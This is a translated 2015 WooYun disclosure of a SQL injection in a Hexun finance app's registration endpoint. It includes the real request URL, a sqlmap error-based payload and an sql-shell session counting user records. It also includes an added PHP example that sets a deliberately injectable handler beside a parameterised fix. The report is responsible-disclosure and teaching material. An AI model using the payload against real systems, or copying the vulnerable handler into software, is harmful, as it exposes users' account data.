Vulnerability Summary

Defect ID: wooyun-2015-0141261

Title: SQL injection in an API of a Hexun Finance app affects the account information of hundreds of thousands of users

Related vendor: 和讯网 (Hexun)

Author: 路人甲

Submitted: 2015-09-15 13:30

Fixed: 2015-10-30 13:48

Disclosed: 2015-10-30 13:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-09-15: Details sent to the vendor; awaiting vendor handling
2015-09-15: Vendor confirmed; details visible to the vendor only
2015-09-25: Details disclosed to core white hats and domain experts
2015-10-05: Details disclosed to regular white hats
2015-10-15: Details disclosed to intern white hats
2015-10-30: Details disclosed to the public

Brief description:

MySQL error-based injection that exposes a large volume of user information.

Detailed description:

Hexun Stocks app. The injection point is the following request:
http://mtrack.hexun.com/track/hcstock.php?task=registeruser&userid=25863150&username=mail98318187&deviceuid=355136055562691&devicetoken=03551360555626910000001034000001&status=active&pushbadge=enabled
The username parameter is injectable, and the endpoint returns database error messages, so error-based injection works directly and quickly. This endpoint clearly reads and writes the user database.

Proof of vulnerability:

[Screenshot: hx.png]

sqlmap output:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: username (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: task=registeruser&userid=25863150&username=mail98318187' AND (SELECT 7125 FROM(SELECT COUNT(*),CONCAT(0x7162716b71,(SELECT (CASE WHEN (7125=7125) THEN 1 ELSE 0 END)),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NzpX'='NzpX&deviceuid=355136055562691&devicetoken=03551360555626910000001034000001&status=active&pushbadge=enabled
---
[04:34:18] [INFO] testing MySQL
[04:34:18] [INFO] confirming MySQL
[04:34:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[04:34:18] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select count(*) from hx_users
[04:34:33] [INFO] fetching SQL SELECT statement query output: 'select count(*) from hx_users'
[04:34:33] [INFO] heuristics detected web page charset 'ascii'
[04:34:33] [WARNING] reflective value(s) found and filtering out
[04:34:33] [INFO] retrieved: 166795
select count(*) from hx_users: '166795'
sql-shell>

Fix recommendation:

Filter the input and use parameterized queries.

Copyright notice: please credit the source when reproducing: 路人甲@乌云
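To show what that recommendation means for this endpoint, here is an added PHP example (not Hexun's own handler) of a hypothetical task=registeruser handler: the string-spliced query that lets a crafted username become SQL, beside a version that allow-lists each parameter and binds it through a prepared statement. The table name hx_users is taken from the sqlmap session above; the column names, validation patterns, DSN and credentials are assumptions.

```php
<?php
// Added example, not Hexun's code: a hypothetical handler for a
// task=registeruser request like the one on track/hcstock.php.
// hx_users comes from the sqlmap session; column names are assumptions.
// VULNERABLE: request values are spliced into the SQL text, so a username like
// mail98318187' AND (SELECT ...) AND 'NzpX'='NzpX becomes part of the statement,
// and with display_errors on, MySQL's error message reaches the client.
function register_user_unsafe(mysqli $db, array $q): bool
{
    $sql = "INSERT INTO hx_users (userid, username, deviceuid, devicetoken, status) "
         . "VALUES ('{$q['userid']}', '{$q['username']}', '{$q['deviceuid']}', "
         . "'{$q['devicetoken']}', '{$q['status']}')";
    return $db->query($sql) !== false;
}
// HARDENED: allow-list each parameter ("filter"), then bind the values with a
// prepared statement ("parameterize") so the username is data, never SQL.
// Patterns are assumptions fitted to the value shapes in the report URL.
function register_user_safe(PDO $db, array $q): bool
{
    $rules = [
        'userid'      => '/^\d{1,10}$/',
        'username'    => '/^[A-Za-z0-9_.]{3,32}$/',
        'deviceuid'   => '/^[A-Za-z0-9]{8,64}$/',
        'devicetoken' => '/^[0-9a-fA-F]{16,64}$/',
        'status'      => '/^(active|inactive)$/',
    ];
    foreach ($rules as $field => $re) {
        if (!isset($q[$field]) || !preg_match($re, $q[$field])) {
            http_response_code(400);   // reject; echo neither the input nor a SQL error
            return false;
        }
    }
    $stmt = $db->prepare('INSERT INTO hx_users (userid, username, deviceuid, devicetoken, status)
                          VALUES (:userid, :username, :deviceuid, :devicetoken, :status)');
    return $stmt->execute([
        ':userid'      => (int) $q['userid'],
        ':username'    => $q['username'],
        ':deviceuid'   => $q['deviceuid'],
        ':devicetoken' => $q['devicetoken'],
        ':status'      => $q['status'],
    ]);
}

// Connection (DSN and credentials assumed): real server-side prepares, and
// exceptions so a failing statement is logged rather than printed to the app.
$pdo = new PDO('mysql:host=localhost;dbname=hx;charset=utf8mb4', 'dbuser', 'dbpass', [
    PDO::ATTR_EMULATE_PREPARES => false,
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
]);
```

With emulated prepares disabled, the bound username is sent to MySQL separately from the statement text, so the quote-and-subquery payload in the sqlmap output is stored as a literal string rather than executed.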


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed at: 2015-09-15 13:46

Vendor reply:

Thanks, handling it.

Latest status:

None yet